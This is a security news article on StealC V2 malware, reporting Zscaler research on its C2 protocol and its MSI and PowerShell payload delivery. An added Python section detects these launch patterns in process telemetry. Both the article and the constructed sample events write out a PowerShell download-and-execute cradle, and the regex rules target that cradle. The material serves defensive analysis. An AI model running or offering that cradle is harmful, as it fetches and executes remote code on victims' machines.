New StealC V2 Expands to Include Microsoft Software Installer Packages and PowerShell Scripts


May 2, 2025 - 16:17

StealC, a popular information stealer and malware downloader that has been active since January 2023, has received a significant update with the introduction of version 2 (V2) in March 2025.

This latest iteration brings substantial enhancements to the malware’s capabilities, including a streamlined command-and-control (C2) communication protocol and the integration of RC4 encryption in recent variants, making it more difficult to detect and analyze.

One of the most notable improvements in StealC V2 is the expansion of its payload delivery options.

While the previous version could only execute EXE and DLL files, the new version can now deliver malicious payloads through Microsoft Software Installer (MSI) packages and PowerShell scripts, significantly broadening its attack surface and potential infection vectors.

The malware also features a redesigned control panel with an integrated builder, allowing threat actors to customize payload delivery rules based on various factors including geolocation, hardware IDs (HWID), and installed software.

Additional enhancements include multi-monitor screenshot capture, a unified file grabber, and server-side brute-forcing of harvested credentials.

Zscaler researchers identified that StealC V2 employs a sophisticated JSON-based communication protocol for its C2 infrastructure.

StealC V2’s communications workflow (Source – Zscaler)

The researchers noted that the malware performs several validation steps before execution, including checking for duplicate instances and verifying that the system language is not one spoken in the Commonwealth of Independent States (CIS), a check that suggests the operators avoid targeting those regions.

The infection process begins with an initial request to register the infection, containing a bot ID (HWID) and botnet ID (build), as shown in the following example registration message:

{
  "build": "main1",
  "hwid": "A9CAA24C-E7F3-3B20-0F54-4BE8A7DC2330",
  "type": "create"
}

Advanced Payload Delivery Mechanisms

The new payload delivery capabilities in StealC V2 represent a significant evolution in the malware’s functionality.

For executing MSI packages, the malware uses the msiexec.exe utility with the silent /passive parameter to minimize user interaction, making installation stealthier.

If the initial installation fails, the malware will retry up to 10 times, demonstrating its persistence.

For PowerShell script execution, StealC V2 utilizes a more direct approach with the command: powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString('[payload]').

This method allows the malware to execute remote scripts directly in memory without writing them to disk, making detection more challenging.

Unlike with MSI packages and executable files, StealC V2 does not attempt to retry failed PowerShell script executions.

These advanced delivery mechanisms allow threat actors to deploy StealC V2 through a variety of methods, effectively bypassing security controls that might be focused on traditional executable files.

The ability to use legitimate Windows utilities like msiexec.exe and PowerShell creates opportunities for the malware to blend in with normal system operations, highlighting the increasingly sophisticated tactics employed by modern malware authors.
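As an added illustration that is not part of the article or the Zscaler report, the following Python shows how a SOC might flag the two launch patterns described above in process-creation telemetry. The event records are constructed, the field names follow the Sysmon Event ID 1 convention, and the user-writable-parent heuristic is an assumption rather than something the report documents.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\Public\update.msi /passive",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\loader.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c iex(New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/p.ps1')",  # placeholder URL
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\loader.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",  # benign: management-agent driven install
     "CommandLine": r"msiexec.exe /i C:\Program Files\Vendor\setup.msi /qn",
     "ParentImage": r"C:\Windows\CCM\ccmexec.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign script
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

# msiexec launched with the /passive switch described in the report.
MSI_PASSIVE = re.compile(r"msiexec(\.exe)?\b.*\s/passive\b", re.I)
# The in-memory download cradle: iex(New-Object Net.WebClient).DownloadString('...').
PS_DOWNLOAD_CRADLE = re.compile(
    r"powershell(\.exe)?\b.*\biex\s*\(\s*new-object\s+(system\.)?net\.webclient\s*\)"
    r"\s*\.downloadstring\s*\(", re.I)
# Assumed heuristic: a parent process living in a user-writable directory.
USER_WRITABLE_PARENT = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|Downloads)\\", re.I)


def classify(event):
    """Return the list of detection tags raised by one process-creation record."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    tags = []
    if MSI_PASSIVE.search(cmd):
        tags.append("msiexec_passive")
    if PS_DOWNLOAD_CRADLE.search(cmd):
        tags.append("powershell_download_cradle")
    # Only escalate the parent-path signal when one of the launch patterns already matched.
    if tags and USER_WRITABLE_PARENT.search(parent):
        tags.append("suspicious_parent")
    return tags


def scan(events):
    """Return (index, tags) for every record that triggers at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"], tags)
```

The two benign records show why the command-line match alone is not enough: silent MSI installs and scheduled scripts are routine, so the parent-path context is what separates the loader-spawned cases.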


The post New StealC V2 Expands to Include Microsoft Software Installer Packages and PowerShell Scripts appeared first on Cyber Security News.